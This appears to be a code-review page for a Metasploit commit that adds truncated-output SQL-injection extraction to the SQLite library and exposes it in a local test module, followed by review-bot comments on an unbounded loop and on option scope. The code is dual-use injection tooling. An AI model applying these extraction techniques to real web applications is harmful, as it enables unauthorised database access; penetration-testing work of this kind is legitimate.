Add truncated-output SQLi support to the SQLite library, and update the test module to expose it as an option
This commit is contained in:
parent
8f9a849591
commit
4374edd37a
|
@ -9,7 +9,7 @@ module Msf::Exploit::SQLi::SQLitei
|
|||
decode: proc { |data| Rex::Text.hex_to_raw(data) }
|
||||
}
|
||||
}.freeze
|
||||
def initialize(opts, &query_proc)
|
||||
def initialize(opts={}, &query_proc)
|
||||
opts[:concat_separator] ||= ','
|
||||
if opts[:encoder].is_a?(String) || opts[:encoder].is_a?(Symbol)
|
||||
opts[:encoder] = opts[:encoder].downcase.intern
|
||||
|
@ -81,6 +81,20 @@ module Msf::Exploit::SQLi::SQLitei
|
|||
|
||||
private
|
||||
|
||||
def truncated_query(query)
|
||||
result = [ ]
|
||||
offset = 1
|
||||
loop do
|
||||
slice = run_sql(query.sub(/\^OFFSET\^/, offset.to_s))
|
||||
offset += @truncation_length # should be same as @truncation_length for most cases
|
||||
result << slice
|
||||
vprint_status "{SQLi} Truncated output: #{slice} of size #{slice.size}"
|
||||
print_warning "The block returned a string larger than the truncation size : #{slice}" if slice.length > @truncation_length
|
||||
break if slice.length < @truncation_length
|
||||
end
|
||||
result.join
|
||||
end
|
||||
|
||||
def call_function(function)
|
||||
function = @encoder[:encode].sub(/\^DATA\^/, function) if @encoder
|
||||
output = nil
|
||||
|
|
|
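Review bot: The `loop do` in truncated_query has no exit when a slice never comes back shorter than @truncation_length: the `print_warning ... if slice.length > @truncation_length` line reports an oversized slice but falls through, so a target that keeps returning full-length or over-length slices is queried forever, with offset advancing past data it already returned. Since an over-length slice means the truncation assumption no longer holds, treat it as terminal as well, e.g. `break if slice.length != @truncation_length` in place of the `<` comparison, and consider an upper bound on the number of iterations. The comment on the `offset += @truncation_length` line reads as if it describes offset; something like `# advance one slice; each slice should be exactly @truncation_length long except the last` says what the author appears to mean. If run_sql can return nil rather than a String (not visible here), `slice.size` in the vprint_status line raises before the length checks run, so a `slice.to_s` coercion may be worth adding.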
@ -28,18 +28,19 @@ class MetasploitModule < Msf::Auxiliary
|
|||
[
|
||||
Opt::RHOST('127.0.0.1'),
|
||||
OptString.new('TARGETURI', [true, 'The target URI', '/']),
|
||||
OptInt.new('SQLI_TYPE', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
|
||||
OptString.new('ENCODER', [false, 'an encoder to use (hex for example)', '']),
|
||||
OptBool.new('HEX_ENCODE_STRINGS', [false, 'replace strings in the query with hex numbers?', false]),
|
||||
OptInt.new('SqliType', [true, '0)Regular. 1) BooleanBlind. 2)TimeBlind', 0]),
|
||||
OptString.new('Encoder', [false, 'an encoder to use (hex for example)', '']),
|
||||
OptBool.new('HexEncodeStrings', [false, 'Replace strings in the query with hex numbers?', false]),
|
||||
OptInt.new('TruncationLength', [true, 'Test SQLi with truncated output (0 or negative to disable)', 0])
|
||||
]
|
||||
)
|
||||
end
|
||||
|
||||
def boolean_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||
sqli = SQLitei::BooleanBasedBlind.new({
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
|
||||
hex_encode_strings: datastore['HexEncodeStrings']
|
||||
}) do |payload|
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
@ -59,10 +60,12 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def reflected
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||
truncation = datastore['TruncationLength'] <= 0 ? nil : datastore['TruncationLength']
|
||||
sqli = SQLitei::Common.new({
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS']
|
||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||
truncation_length: truncation
|
||||
}) do |payload|
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
@ -78,7 +81,8 @@ class MetasploitModule < Msf::Auxiliary
|
|||
if !body
|
||||
''
|
||||
else
|
||||
body.strip
|
||||
body = body.strip
|
||||
truncation ? body[0, truncation] : body
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -90,10 +94,10 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def time_blind
|
||||
encoder = datastore['ENCODER'].empty? ? nil : datastore['ENCODER'].intern
|
||||
encoder = datastore['Encoder'].empty? ? nil : datastore['Encoder'].intern
|
||||
sqli = SQLitei::TimeBasedBlind.new({
|
||||
encoder: encoder,
|
||||
hex_encode_strings: datastore['HEX_ENCODE_STRINGS'],
|
||||
hex_encode_strings: datastore['HexEncodeStrings'],
|
||||
}) do |payload|
|
||||
res = send_request_cgi({
|
||||
'uri' => normalize_uri(target_uri.path, 'index.php'),
|
||||
|
@ -139,7 +143,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
case datastore['SQLI_TYPE']
|
||||
case datastore['SqliType']
|
||||
when 0 then reflected
|
||||
when 1 then boolean_blind
|
||||
when 2 then time_blind
|
||||
|
|
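Review bot: The new `TruncationLength` option is only honoured by `reflected`; the option hashes built in `boolean_blind` and `time_blind` do not pass `truncation_length`, yet the option description suggests it applies to any SqliType. Either state the scope in the description, e.g. `OptInt.new('TruncationLength', [true, 'Test SQLi with truncated output (0 or negative to disable; only used when SqliType is 0)', 0])`, or pass the value through for the blind variants too if the library supports it. The `truncation_length: truncation` argument is nil when the option is disabled, which relies on SQLitei::Common treating nil as "no truncation"; that constructor is outside this diff, so worth confirming.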